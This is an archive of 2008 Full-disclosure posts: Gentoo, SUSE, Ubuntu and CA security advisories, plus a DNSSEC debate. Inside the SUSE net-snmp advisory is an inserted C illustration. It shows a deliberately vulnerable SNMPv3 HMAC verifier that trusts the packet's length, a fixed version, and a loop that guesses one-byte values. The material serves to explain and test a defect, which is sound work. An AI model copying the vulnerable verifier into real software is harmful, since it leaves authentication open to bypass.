From: rbu at gentoo.org (Robert Buchholz)
Date: Fri, 1 Aug 2008 01:33:28 +0200
Subject: [Full-disclosure] [ GLSA 200807-16 ] Python: Multiple vulnerabilities
Message-ID: <200808010133.31885.rbu@gentoo.org>

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                   Gentoo Linux Security Advisory           GLSA 200807-16
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                                            http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
     Title: Python: Multiple vulnerabilities
      Date: July 31, 2008
      Bugs: #230640, #232137
        ID: 200807-16

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

Multiple vulnerabilities in Python may allow for the execution of
arbitrary code.

Background
==========

Python is an interpreted, interactive, object-oriented programming
language.

Affected packages
=================

    -------------------------------------------------------------------
     Package          /  Vulnerable  /                      Unaffected
    -------------------------------------------------------------------
  1  dev-lang/python     < 2.5.2-r6             *>= 2.4.4-r14
                                                       >= 2.5.2-r6

Description
===========

Multiple vulnerabilities were discovered in Python:

* David Remahl of Apple Product Security reported several integer
  overflows in core modules such as stringobject, unicodeobject,
  bufferobject, longobject, tupleobject, stropmodule, gcmodule,
  mmapmodule (CVE-2008-2315).

* David Remahl of Apple Product Security also reported an integer
  overflow in the hashlib module, leading to unreliable cryptographic
  digest results (CVE-2008-2316).

* Justin Ferguson reported multiple buffer overflows in unicode string
  processing that only affect 32bit systems (CVE-2008-3142).

* The Google Security Team reported multiple integer overflows
  (CVE-2008-3143).
* Justin Ferguson reported multiple integer underflows and overflows in
  the PyOS_vsnprintf() function, and an off-by-one error when passing
  zero-length strings, leading to memory corruption (CVE-2008-3144).

Impact
======

A remote attacker could exploit these vulnerabilities in Python
applications or daemons that pass user-controlled input to vulnerable
functions. Exploitation might lead to the execution of arbitrary code or
a Denial of Service. Vulnerabilities within the hashlib might lead to
weakened cryptographic protection of data integrity or authenticity.

Workaround
==========

There is no known workaround at this time.

Resolution
==========

All Python 2.4 users should upgrade to the latest version:

    # emerge --sync
    # emerge --ask --oneshot --verbose ">=dev-lang/python-2.4.4-r14"

All Python 2.5 users should upgrade to the latest version:

    # emerge --sync
    # emerge --ask --oneshot --verbose ">=dev-lang/python-2.5.2-r6"

Please note that Python 2.3 is masked since June 24, and we will not be
releasing updates to it. It will be removed from the tree in the near
future.

References
==========

  [ 1 ] CVE-2008-2315
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2315
  [ 2 ] CVE-2008-2316
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2316
  [ 3 ] CVE-2008-3142
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3142
  [ 4 ] CVE-2008-3143
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3143
  [ 5 ] CVE-2008-3144
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3144

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200807-16.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
security at gentoo.org or alternatively, you may file a bug at
http://bugs.gentoo.org.
License
=======

Copyright 2008 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5


From: Everhart at gce.com (Mary and Glenn Everhart)
Date: Thu, 31 Jul 2008 20:29:13 -0400
Subject: [Full-disclosure] Re DNS spoofing issue discussion
Message-ID: <489258D9.1090008@gce.com>

To: Valdis.Kletnieks at vt.edu
Subject: RE: [Full-disclosure] DNS spoofing issue. Thoughts on

I chose my wording to cover not only DNSSEC but possible alternatives
that could be devised. Certs are not the only way to do it, but it needs
to be installed all over.

The BGP fixes were devised after the last meltdown, but question again
is whether they are installed. If DNSSEC had been installed, Kaminsky's
issue would not exist.

Since the number of sites running BGP among themselves is not that huge,
it is probably not as practical an attack vector. Last meltdown that
happened was said to be solved largely because most of the BGP site
operators knew each other well enough to recognize voices on the phone.
Net's bigger now tho.

The fact that the recent youtube route hijack and the kenya routing
insecurity incidents happened suggests that the md5 security is not in
fact in place much (needs predefined secrets installed and apparently
people don't configure it to do anything). That being the case, a
reminder that maybe it could be good to reexamine this seems not totally
daft.

Glenn Everhart
Everhart at gce.com
(posting from home; I am the same one who has posted from work also.)
-----Original Message-----
From: Valdis.Kletnieks at vt.edu [mailto:Valdis.Kletnieks at vt.edu]
Sent: Wednesday, July 30, 2008 11:30 AM
To: Everhart, Glenn (Card Services)
Cc: pschmehl_lists_nada at tx.rr.com; randallm at fidmail.com; full-disclosure at lists.grok.org.uk
Subject: Re: [Full-disclosure] DNS spoofing issue. Thoughts on

On Sun, 27 Jul 2008 14:07:03 EDT, Glenn.Everhart at ch.a.sx.com said:
> The need for something more like ssl certs in there remains

It's called DNSSEC, which has been out for a decade and more.

> (Also needed for bgp I suspect).

RFC2385 (TCP MD5 protection for BGP) addresses most of the issues, at
least on a peer-to-peer basis, and has been out for a decade. There's a
discussion of the issues in RFC5123.


From: don.bailey at gmail.com (don bailey)
Date: Thu, 31 Jul 2008 21:17:00 -0600
Subject: [Full-disclosure] Re DNS spoofing issue discussion
In-Reply-To: <489258D9.1090008@gce.com>
References: <489258D9.1090008@gce.com>
Message-ID: <4892802C.2060801@gmail.com>

> The BGP fixes were devised after the last meltdown, but question again
> is whether they are installed. If DNSSEC had been installed, Kaminsky's
> issue
> would not exist.
>

That's probably not the case. It would only alter the scope of attack to
include encryption and not simply port+xid. Since UDP is stateless one
could have theoretically kicked off some semblance of brute force attack
against the key used for encryption. For algorithms that use bits larger
than would be feasible for brute force attacks, the latest SNMPv3
vulnerability comes to mind, as does Tim Newsham's attack on WEP.

In other words, there are always options. The attack wouldn't have gone
away. As they say, there are 1,000,000 ways to get to Detroit.
D


From: pschmehl_lists at tx.rr.com (Paul Schmehl)
Date: Thu, 31 Jul 2008 22:37:20 -0500
Subject: [Full-disclosure] Re DNS spoofing issue discussion
In-Reply-To: <4892802C.2060801@gmail.com>
References: <489258D9.1090008@gce.com> <4892802C.2060801@gmail.com>
Message-ID: <72B7D507D7C1A86FA3BB2333@Macintosh.local>

--On July 31, 2008 9:17:00 PM -0600 don bailey wrote:

>> The BGP fixes were devised after the last meltdown, but question again
>> is whether they are installed. If DNSSEC had been installed, Kaminsky's
>> issue
>> would not exist.
>>
>
> That's probably not the case. It would only alter the scope of
> attack to include encryption and not simply port+xid. Since UDP
> is stateless one could have theoretically kicked off some
> semblance of brute force attack against the key used for
> encryption. For algorithms that use bits larger than would be
> feasible for brute force attacks, the latest SNMPv3 vulnerability
> comes to mind, as does Tim Newsham's attack on WEP.
>
> In other words, there are always options. The attack wouldn't have
> gone away. As they say, there are 1,000,000 ways to get to Detroit.
>

Apples and oranges. *Attacks* will never go away, but dnssec, if fully
implemented, would render Dan's attack moot. Unless you've factored 256
bit RSA keys, in which case you should be making six figures.

Paul Schmehl
If it isn't already obvious, my opinions are my own and not those of my
employer.
From: don.bailey at gmail.com (don bailey)
Date: Thu, 31 Jul 2008 22:02:00 -0600
Subject: [Full-disclosure] Re DNS spoofing issue discussion
In-Reply-To: <72B7D507D7C1A86FA3BB2333@Macintosh.local>
References: <489258D9.1090008@gce.com> <4892802C.2060801@gmail.com> <72B7D507D7C1A86FA3BB2333@Macintosh.local>
Message-ID: <48928AB8.805@gmail.com>

> Apples and oranges. *Attacks* will never go away, but dnssec, if fully
> implemented, would render Dan's attack moot. Unless you've factored 256
> bit RSA keys, in which case you should be making six figures.
>

Maybe I wasn't being clear, Mr. Paul Schmehl.

The static port vulnerability allows for the effective attack against
the xid name space. So, there are really two attacks here. One is based
on the fact that there are static ports, the other is based on the small
number of bits used. Two problems. Compounded together. Into one attack.

If there was a weakness in a particular implementation of DNSSEC that
was made more feasible by the fact that people still used static ports,
we would still be having a large hullabaloo about "attack, attack!!!".

So, Mr. Paul Schmehl, it is not "apples and oranges". It is simply a
different way of thinking.

And how do you know I don't already make six figures? Don't you have a
Red Hat image to install on a workstation somewhere?
D


From: pschmehl_lists at tx.rr.com (Paul Schmehl)
Date: Thu, 31 Jul 2008 23:28:32 -0500
Subject: [Full-disclosure] Re DNS spoofing issue discussion
In-Reply-To: <48928AB8.805@gmail.com>
References: <489258D9.1090008@gce.com> <4892802C.2060801@gmail.com> <72B7D507D7C1A86FA3BB2333@Macintosh.local> <48928AB8.805@gmail.com>

--On July 31, 2008 10:02:00 PM -0600 don bailey wrote:
>
> And how do you know I don't already make six figures?

Oh, that's easy. If you were making six figures, you wouldn't be
posting in FD.

> Don't you have a Red Hat image to install on a workstation somewhere?

I hate RedHat. It's worse than Windows (and that's hard to do.)

Paul Schmehl
If it isn't already obvious, my opinions are my own and not those of my
employer.


From: don.bailey at gmail.com (don bailey)
Date: Fri, 01 Aug 2008 00:50:04 -0600
Subject: [Full-disclosure] Re DNS spoofing issue discussion
References: <489258D9.1090008@gce.com> <4892802C.2060801@gmail.com> <72B7D507D7C1A86FA3BB2333@Macintosh.local> <48928AB8.805@gmail.com>
Message-ID: <4892B21C.70401@gmail.com>

>> And how do you know I don't already make six figures?
>
> Oh, that's easy. If you were making six figures, you wouldn't be
> posting in FD.
>

Sadly, I can't find a flaw in your logic.
D


From: James.Williams at ca.com (Williams, James K)
Date: Fri, 1 Aug 2008 06:52:54 -0400
Subject: [Full-disclosure] CA ARCserve Backup for Laptops and Desktops Server LGServer Service Vulnerability
Message-ID: <649CDCB56C88AA458EFF2CBF494B620405315A2A@USILMS12.ca.com>

Title: CA ARCserve Backup for Laptops and Desktops Server LGServer
Service Vulnerability

CA Advisory Date: 2008-07-31

Reported By: Vulnerability Research Team of Assurent Secure
Technologies, a TELUS Company

Impact: A remote attacker can execute arbitrary code or cause a denial
of service condition.

Summary: CA ARCserve Backup for Laptops and Desktops server contains a
vulnerability that can allow a remote attacker to execute arbitrary
code or cause a denial of service condition. CA has issued updates to
address the vulnerability. The vulnerability, CVE-2008-3175, occurs due
to insufficient bounds checking by the LGServer service. An attacker
can make a request that can result in arbitrary code execution or crash
the service.

Mitigating Factors: Only the server installation of BrightStor ARCserve
Backup for Laptops and Desktops is affected. The client installation is
not affected.

Severity: CA has given this vulnerability a High risk rating.

Affected Products:
CA ARCserve Backup for Laptops and Desktops r11.5
CA ARCserve Backup for Laptops and Desktops r11.1 SP2
CA ARCserve Backup for Laptops and Desktops r11.1 SP1
CA ARCserve Backup for Laptops and Desktops r11.1
CA ARCserve Backup for Laptops and Desktops r11.0
CA Desktop Management Suite 11.2
CA Desktop Management Suite 11.1
CA Protection Suites r2
CA Protection Suites 3.0
CA Protection Suites 3.1

Affected Platforms:
Windows

Status and Recommendation:
CA has provided the following updates to address the vulnerability.

CA ARCserve Backup for Laptops and Desktops 11.1, 11.1 SP1, 11.1 SP2:
Upgrade to 11.1 SP2 and apply RO00912.
CA ARCserve Backup for Laptops and Desktops 11.5:
RO00913.

CA Protection Suites 3.0:
RO00912.

CA Protection Suites 3.1:
RO00912.

CA Desktop Management Suite 11.2:
Upgrade to CA Desktop Management Suite 11.2 C1 and apply RO00913.

CA Desktop Management Suite 11.1:
RO01150.

CA ARCserve Backup for Laptops and Desktops 11.0:
Upgrade to ARCserve Backup for Laptops and Desktops version 11.1 SP2
and apply the latest patches. QI85497.

Note: CA Protection Suites r2 includes CA ARCserve Backup for Laptops
and Desktops 11.0.

How to determine if you are affected:

For Windows:

1. Using Windows Explorer, locate the file "rxRPC.dll". The file can be
   found in the following default locations:

   CA ARCserve Backup for Laptops and Desktops 11.5:
   C:\Program Files\CA\BrightStor ARCserve Backup for Laptops and Desktops\Server

   CA ARCserve Backup for Laptops and Desktops 11.1, 11.1 SP1, 11.1 SP2:
   C:\Program Files\CA\BrightStor ARCserve Backup for Laptops & Desktops\server

   CA Protection Suites 3.0:
   C:\Program Files\CA\BrightStor ARCserve Backup for Laptops & Desktops\server

   CA Protection Suites 3.1:
   C:\Program Files\CA\BrightStor ARCserve Backup for Laptops & Desktops\server

   CA Desktop Management Suite 11.2:
   C:\Program Files\CA\Unicenter DSM\BABLD\Server

   CA Desktop Management Suite 11.1:
   C:\Program Files\CA\Unicenter DSM\BABLD\Server

2. Right click on the file and select Properties.

3. Select the General tab.

4. If the file date is earlier than indicated in the below table, the
   installation is vulnerable.
CA ARCserve Backup for Laptops and Desktops
File Name    File Size (bytes)    File Date
rxRPC.dll    131,072              June 11, 2008

CA ARCserve Backup for Laptops and Desktops 11.1, 11.1 SP1, 11.1 SP2
File Name    File Size (bytes)    File Date
rxRPC.dll    114,688              June 11, 2008

CA Protection Suites 3.0
File Name    File Size (bytes)    File Date
rxRPC.dll    114,688              June 11, 2008

CA Protection Suites 3.1
File Name    File Size (bytes)    File Date
rxRPC.dll    114,688              June 11, 2008

CA Desktop Management Suite 11.2
File Name    File Size (bytes)    File Date
rxRPC.dll    131,072              June 11, 2008

CA Desktop Management Suite 11.1
File Name    File Size (bytes)    File Date
rxRPC.dll    122,880              June 11, 2008

Workaround:
None

References (URLs may wrap):
CA Support:
http://support.ca.com/
Security Notice for CA ARCserve Backup for Laptops and Desktops Server
LGServer
https://support.ca.com/irj/portal/anonymous/phpsupcontent?contentID=181721
Solution Document Reference APARs:
RO00912, RO00913, RO01150, QI85497
CA Security Response Blog posting:
CA ARCserve Backup for Laptops and Desktops Server LGServer Service
Vulnerability
community.ca.com/blogs/casecurityresponseblog/archive/2008/08/01.aspx
Reported By:
Vulnerability Research Team of Assurent Secure Technologies, a TELUS
Company.
http://www.assurent.com/
CVE References:
CVE-2008-3175 - LGServer buffer overflow
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3175
OSVDB References: Pending
http://osvdb.org/

Changelog for this advisory:
v1.0 - Initial Release

Customers who require additional information should contact CA
Technical Support at http://support.ca.com.

For technical questions or comments related to this advisory, please
send email to vuln AT ca DOT com.

If you discover a vulnerability in CA products, please report your
findings to our product security response team.
https://support.ca.com/irj/portal/anonymous/phpsupcontent?contentID=177782

Regards,
Ken Williams ; 0xE2941985
Director, CA Vulnerability Research

CA, 1 CA Plaza, Islandia, NY 11749

Contact http://www.ca.com/us/contact/
Legal Notice http://www.ca.com/us/legal/
Privacy Policy http://www.ca.com/us/privacy/
Copyright (c) 2008 CA. All rights reserved.


From: thomas at suse.de (Thomas Biege)
Date: Fri, 01 Aug 2008 13:35:27 +0200
Subject: [Full-disclosure] SUSE Security Announcement: net-snmp (SUSE-SA:2008:039)
Message-ID: <4892f4ff.HIqez12FotScq3lj%thomas@suse.de>

______________________________________________________________________________

                        SUSE Security Announcement

        Package:                net-snmp
        Announcement ID:        SUSE-SA:2008:039
        Date:                   Fri, 01 Aug 2008 13:00:00 +0000
        Affected Products:      openSUSE 10.2
                                openSUSE 10.3
                                openSUSE 11.0
                                SUSE SLES 9
                                Novell Linux Desktop 9
                                Open Enterprise Server
                                Novell Linux POS 9
                                SUSE Linux Enterprise Desktop 10 SP1
                                SLE SDK 10 SP1
                                SLE SDK 10 SP2
                                SUSE Linux Enterprise Server 10 SP1
                                SUSE Linux Enterprise Desktop 10 SP2
                                SUSE Linux Enterprise Server 10 SP2
        Vulnerability Type:     authentication bypass, denial-of-service
        Severity (1-10):        6
        SUSE Default Package:   no
        Cross-References:       CVE-2008-0960
                                CVE-2008-2292

    Content of This Advisory:
        1) Security Vulnerability Resolved:
             - authentication bypass
             - denial-of-service
           Problem Description
        2) Solution or Work-Around
        3) Special Instructions and Notes
        4) Package Location and Checksums
        5) Pending Vulnerabilities, Solutions, and Work-Arounds:
            - viewvc/subversion
        6) Authenticity Verification and Additional Information
______________________________________________________________________________

1) Problem Description and Brief Discussion

The
net-snmp daemon implements the "simple network management protocol".
Version 3 of SNMP as implemented in net-snmp uses the length of the HMAC
in a packet to verify against a local HMAC for authentication. An
attacker can therefore send an SNMPv3 packet with a one byte HMAC and
guess the correct first byte of the local HMAC with 256 packets (max).

Additionally a buffer overflow in perl-snmp was fixed that can cause a
denial-of-service/crash.

2) Solution or Work-Around

Please install the update package.

3) Special Instructions and Notes

Please restart net-snmp after the update.

4) Package Location and Checksums

The preferred method for installing security updates is to use the YaST
Online Update (YOU) tool. YOU detects which updates are required and
automatically performs the necessary steps to verify and install them.
Alternatively, download the update packages for your distribution
manually and verify their integrity by the methods listed in Section 6
of this announcement. Then install the packages using the command

  rpm -Fhv

to apply the update, replacing with the filename of the downloaded RPM
package.
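The problem description above says the verifier compared only as many HMAC bytes as the packet claimed to carry. The following is an added illustration of that defect class, written for this page and not taken from net-snmp: the HMAC computation itself is out of scope, so a constructed 12-byte "local" HMAC stands in for the value the receiver would compute over the packet with the user's authentication key, and the vulnerable verifier is shown beside a corrected one.

```c
/* Added example, not net-snmp source. Shows the verifier defect described
 * in SUSE-SA:2008:039 (CVE-2008-0960): trusting the packet-supplied HMAC
 * length when checking SNMPv3 USM authentication. */
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* USM HMAC-MD5-96 / HMAC-SHA-96 truncate the MAC to 12 bytes (RFC 3414). */
#define USM_AUTH_LEN 12

/* Constructed sample standing in for the receiver's locally computed HMAC. */
static const uint8_t sample_local_mac[USM_AUTH_LEN] = {
    0x3a, 0x91, 0xc4, 0x07, 0x5e, 0xd2, 0x88, 0x19, 0xf0, 0x6b, 0x2d, 0xaa
};

typedef int (*auth_verifier)(const uint8_t *local_mac,
                             const uint8_t *pkt_mac, size_t pkt_mac_len);

/* Vulnerable shape: the comparison length comes from the packet, so a
 * 1-byte msgAuthenticationParameters field only has to match the first
 * byte of the local HMAC (256 possibilities), and a 0-byte field matches
 * trivially because memcmp() over zero bytes returns 0. */
int verify_auth_vulnerable(const uint8_t *local_mac,
                           const uint8_t *pkt_mac, size_t pkt_mac_len)
{
    if (pkt_mac_len > USM_AUTH_LEN)
        return 0;                 /* oversize is rejected, undersize is not */
    return memcmp(local_mac, pkt_mac, pkt_mac_len) == 0;
}

/* Hardened shape: the expected length is fixed by the protocol and never
 * taken from the untrusted packet; the full MAC is compared in constant
 * time so the comparison leaks nothing about where the mismatch occurs. */
int verify_auth_fixed(const uint8_t *local_mac,
                      const uint8_t *pkt_mac, size_t pkt_mac_len)
{
    if (pkt_mac_len != USM_AUTH_LEN)
        return 0;
    uint8_t diff = 0;
    for (size_t i = 0; i < USM_AUTH_LEN; i++)
        diff |= (uint8_t)(local_mac[i] ^ pkt_mac[i]);
    return diff == 0;
}

/* Regression check a maintainer would keep: feed every possible 1-byte
 * authentication field to a verifier and count how many are accepted.
 * A correct verifier accepts none; the vulnerable one accepts exactly one
 * (the byte equal to the first byte of the local HMAC). */
int count_accepted_single_byte(auth_verifier verify, const uint8_t *local_mac)
{
    int accepted = 0;
    for (int b = 0; b < 256; b++) {
        uint8_t one_byte = (uint8_t)b;
        accepted += verify(local_mac, &one_byte, 1);
    }
    return accepted;
}

int main(void)
{
    const uint8_t empty = 0;
    printf("vulnerable: 1-byte fields accepted = %d, 0-byte field accepted = %d\n",
           count_accepted_single_byte(verify_auth_vulnerable, sample_local_mac),
           verify_auth_vulnerable(sample_local_mac, &empty, 0));
    printf("fixed:      1-byte fields accepted = %d, full 12-byte MAC accepted = %d\n",
           count_accepted_single_byte(verify_auth_fixed, sample_local_mac),
           verify_auth_fixed(sample_local_mac, sample_local_mac, USM_AUTH_LEN));
    return 0;
}
```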
x86 Platform:

openSUSE 11.0:
http://download.opensuse.org/pub/opensuse/update/11.0/rpm/i586/libsnmp15-5.4.1-77.2.i586.rpm
http://download.opensuse.org/pub/opensuse/update/11.0/rpm/i586/net-snmp-5.4.1-77.2.i586.rpm
http://download.opensuse.org/pub/opensuse/update/11.0/rpm/i586/net-snmp-devel-5.4.1-77.2.i586.rpm
http://download.opensuse.org/pub/opensuse/update/11.0/rpm/i586/perl-SNMP-5.4.1-77.2.i586.rpm
http://download.opensuse.org/pub/opensuse/update/11.0/rpm/i586/snmp-mibs-5.4.1-77.2.i586.rpm

openSUSE 10.3:
http://download.opensuse.org/pub/opensuse/update/10.3/rpm/i586/libsnmp15-5.4.1-19.2.i586.rpm
http://download.opensuse.org/pub/opensuse/update/10.3/rpm/i586/net-snmp-5.4.1-19.2.i586.rpm
http://download.opensuse.org/pub/opensuse/update/10.3/rpm/i586/net-snmp-devel-5.4.1-19.2.i586.rpm
http://download.opensuse.org/pub/opensuse/update/10.3/rpm/i586/perl-SNMP-5.4.1-19.2.i586.rpm
http://download.opensuse.org/pub/opensuse/update/10.3/rpm/i586/snmp-mibs-5.4.1-19.2.i586.rpm

openSUSE 10.2:
ftp://ftp.suse.com/pub/suse/update/10.2/rpm/i586/net-snmp-5.4.rc2-8.i586.rpm
ftp://ftp.suse.com/pub/suse/update/10.2/rpm/i586/net-snmp-devel-5.4.rc2-8.i586.rpm
ftp://ftp.suse.com/pub/suse/update/10.2/rpm/i586/perl-SNMP-5.4.rc2-8.i586.rpm

x86-64 Platform:

openSUSE 11.0:
http://download.opensuse.org/pub/opensuse/update/11.0/rpm/x86_64/net-snmp-32bit-5.4.1-77.2.x86_64.rpm

openSUSE 10.3:
http://download.opensuse.org/pub/opensuse/update/10.3/rpm/x86_64/net-snmp-32bit-5.4.1-19.2.x86_64.rpm

openSUSE 10.2:
ftp://ftp.suse.com/pub/suse/update/10.2/rpm/x86_64/net-snmp-32bit-5.4.rc2-8.x86_64.rpm

Sources:

openSUSE 11.0:
http://download.opensuse.org/pub/opensuse/update/11.0/rpm/src/net-snmp-5.4.1-77.2.src.rpm

openSUSE 10.3:
http://download.opensuse.org/pub/opensuse/update/10.3/rpm/src/net-snmp-5.4.1-19.2.src.rpm

openSUSE 10.2:
ftp://ftp.suse.com/pub/suse/update/10.2/rpm/src/net-snmp-5.4.rc2-8.src.rpm

Our maintenance customers are notified individually.
The packages are offered for installation from the maintenance web:

Open Enterprise Server
http://download.novell.com/index.jsp?search=Search&keywords=71093bdfd49361f6dbe32a8fde43b848

Novell Linux POS 9
http://download.novell.com/index.jsp?search=Search&keywords=71093bdfd49361f6dbe32a8fde43b848

Novell Linux Desktop 9
http://download.novell.com/index.jsp?search=Search&keywords=71093bdfd49361f6dbe32a8fde43b848

SUSE Linux Enterprise Server 10 SP1
http://download.novell.com/index.jsp?search=Search&keywords=71093bdfd49361f6dbe32a8fde43b848

SUSE Linux Enterprise Server 10 SP2
http://download.novell.com/index.jsp?search=Search&keywords=71093bdfd49361f6dbe32a8fde43b848

SLE SDK 10 SP2
http://download.novell.com/index.jsp?search=Search&keywords=71093bdfd49361f6dbe32a8fde43b848

SLE SDK 10 SP1
http://download.novell.com/index.jsp?search=Search&keywords=71093bdfd49361f6dbe32a8fde43b848

SUSE Linux Enterprise Desktop 10 SP1
http://download.novell.com/index.jsp?search=Search&keywords=71093bdfd49361f6dbe32a8fde43b848

SUSE Linux Enterprise Desktop 10 SP2
http://download.novell.com/index.jsp?search=Search&keywords=71093bdfd49361f6dbe32a8fde43b848

SUSE SLES 9
http://download.novell.com/index.jsp?search=Search&keywords=71093bdfd49361f6dbe32a8fde43b848

______________________________________________________________________________

5) Pending Vulnerabilities, Solutions, and Work-Arounds:

- viewvc/subversion
  This update of subversion fixes multiple vulnerabilities.
  - CVE-2008-1290: list CVS or SVN commits on "all-forbidden" files
  - CVE-2008-1291: directly access hidden CVSROOT folders
  - CVE-2008-1292: expose restricted content via the revision view,
    the log history, or the diff view

______________________________________________________________________________

6) Authenticity Verification and Additional Information

- Announcement authenticity verification:

  SUSE security announcements are published via mailing lists and on
  Web sites.
  The authenticity and integrity of a SUSE security announcement is
  guaranteed by a cryptographic signature in each announcement. All SUSE
  security announcements are published with a valid signature.

  To verify the signature of the announcement, save it as text into a
  file and run the command

    gpg --verify

  replacing with the name of the file where you saved the announcement.
  The output for a valid signature looks like:

    gpg: Signature made using RSA key ID 3D25D3D9
    gpg: Good signature from "SuSE Security Team "

  where is replaced by the date the document was signed.

  If the security team's key is not contained in your key ring, you can
  import it from the first installation CD. To import the key, use the
  command

    gpg --import gpg-pubkey-3d25d3d9-36e12d04.asc

- Package authenticity verification:

  SUSE update packages are available on many mirror FTP servers all over
  the world. While this service is considered valuable and important to
  the free and open source software community, the authenticity and the
  integrity of a package needs to be verified to ensure that it has not
  been tampered with.

  The internal rpm package signatures provide an easy way to verify the
  authenticity of an RPM package. Use the command

    rpm -v --checksig

  to verify the signature of the package, replacing with the filename of
  the RPM package downloaded. The package is unmodified if it contains a
  valid signature from build at suse.de with the key ID 9C800ACA.

  This key is automatically imported into the RPM database (on
  RPMv4-based distributions) and the gpg key ring of 'root' during
  installation. You can also find it on the first installation CD and at
  the end of this announcement.

- SUSE runs two security mailing lists to which any interested party may
  subscribe:

  opensuse-security at opensuse.org
    - General Linux and SUSE security discussion.
      All SUSE security announcements are sent to this list.
      To subscribe, send an e-mail to .

  opensuse-security-announce at opensuse.org
    - SUSE's announce-only mailing list.
      Only SUSE's security announcements are sent to this list.
      To subscribe, send an e-mail to .

  =====================================================================
  SUSE's security contact is or .
  The public key is listed below.
  =====================================================================
______________________________________________________________________________

  The information in this advisory may be distributed or reproduced,
  provided that the advisory is not modified in any way. In particular,
  the clear text signature should show proof of the authenticity of the
  text.

  SUSE Linux Products GmbH provides no warranties of any kind whatsoever
  with respect to the information contained in this security advisory.

Type Bits/KeyID     Date        User ID
pub  2048R/3D25D3D9 1999-03-06  SuSE Security Team
pub  1024D/9C800ACA 2000-10-19  SuSE Package Signing Key
From: kees at ubuntu.com (Kees Cook)
Date: Fri, 1 Aug 2008 07:51:27 -0700
Subject: [Full-disclosure] [USN-632-1] Python vulnerabilities
Message-ID: <20080801145127.GC21348@outflux.net>

===========================================================
Ubuntu Security Notice USN-632-1             August 01, 2008
python2.4, python2.5 vulnerabilities
CVE-2008-1679, CVE-2008-1721, CVE-2008-1887, CVE-2008-2315,
CVE-2008-2316, CVE-2008-3142, CVE-2008-3143, CVE-2008-3144
===========================================================

A security issue affects the following Ubuntu releases:

Ubuntu 6.06 LTS
Ubuntu 7.04
Ubuntu 7.10
Ubuntu 8.04 LTS

This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.
The problem can be corrected by upgrading your system to the
following package versions:

Ubuntu 6.06 LTS:
  python2.4                       2.4.3-0ubuntu6.2
  python2.4-minimal               2.4.3-0ubuntu6.2

Ubuntu 7.04:
  python2.4                       2.4.4-2ubuntu7.2
  python2.4-minimal               2.4.4-2ubuntu7.2
  python2.5                       2.5.1-0ubuntu1.2
  python2.5-minimal               2.5.1-0ubuntu1.2

Ubuntu 7.10:
  python2.4                       2.4.4-6ubuntu4.2
  python2.4-minimal               2.4.4-6ubuntu4.2
  python2.5                       2.5.1-5ubuntu5.2
  python2.5-minimal               2.5.1-5ubuntu5.2

Ubuntu 8.04 LTS:
  python2.4                       2.4.5-1ubuntu4.1
  python2.4-minimal               2.4.5-1ubuntu4.1
  python2.5                       2.5.2-2ubuntu4.1
  python2.5-minimal               2.5.2-2ubuntu4.1

After a standard system upgrade you need to reboot your computer to
effect the necessary changes.

Details follow:

It was discovered that there were new integer overflows in the imageop
module. If an attacker were able to trick a Python application into
processing a specially crafted image, they could execute arbitrary code
with user privileges. (CVE-2008-1679)

Justin Ferguson discovered that the zlib module did not correctly handle
certain archives. If an attacker were able to trick a Python application
into processing a specially crafted archive file, they could execute
arbitrary code with user privileges. (CVE-2008-1721)

Justin Ferguson discovered that certain string manipulations in Python
could be made to overflow. If an attacker were able to pass a specially
crafted string through the PyString_FromStringAndSize function, they
could execute arbitrary code with user privileges. (CVE-2008-1887)

Multiple integer overflows were discovered in Python's core and modules
including hashlib, binascii, pickle, md5, stringobject, unicodeobject,
bufferobject, longobject, tupleobject, stropmodule, gcmodule, and
mmapmodule. If an attacker were able to exploit these flaws they could
execute arbitrary code with user privileges or cause Python applications
to crash, leading to a denial of service. (CVE-2008-2315, CVE-2008-2316,
CVE-2008-3142, CVE-2008-3143, CVE-2008-3144).
From kees at ubuntu.com Fri Aug 1 16:26:31 2008
From: kees at ubuntu.com (Kees Cook)
Date: Fri, 1 Aug 2008 08:26:31 -0700
Subject: [Full-disclosure] [USN-633-1] libxslt vulnerabilities
Message-ID: <20080801152631.GE21348@outflux.net>

===========================================================
Ubuntu Security Notice USN-633-1             August 01, 2008
libxslt vulnerabilities
CVE-2008-1767, CVE-2008-2935
===========================================================

A security issue affects the following Ubuntu releases:

Ubuntu 6.06 LTS
Ubuntu 7.04
Ubuntu 7.10
Ubuntu 8.04 LTS

This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the
following package versions:

Ubuntu 6.06 LTS:
  libxslt1.1                      1.1.15-1ubuntu1.2

Ubuntu 7.04:
  libxslt1.1                      1.1.20-0ubuntu2.2

Ubuntu 7.10:
  libxslt1.1                      1.1.21-2ubuntu2.2

Ubuntu 8.04 LTS:
  libxslt1.1                      1.1.22-1ubuntu1.2

In general, a standard system upgrade is sufficient to effect the
necessary changes.

Details follow:

It was discovered that long transformation matches in libxslt could
overflow. If an attacker were able to make an application linked against
libxslt process malicious XSL style sheet input, they could execute
arbitrary code with user privileges or cause the application to crash,
leading to a denial of service. (CVE-2008-1767)

Chris Evans discovered that the RC4 processing code in libxslt did not
correctly handle corrupted key information. If a remote attacker were
able to make an application linked against libxslt process malicious XML
input, they could crash the application, leading to a denial of service.
(CVE-2008-2935)
From kees at ubuntu.com Fri Aug 1 16:27:01 2008
From: kees at ubuntu.com (Kees Cook)
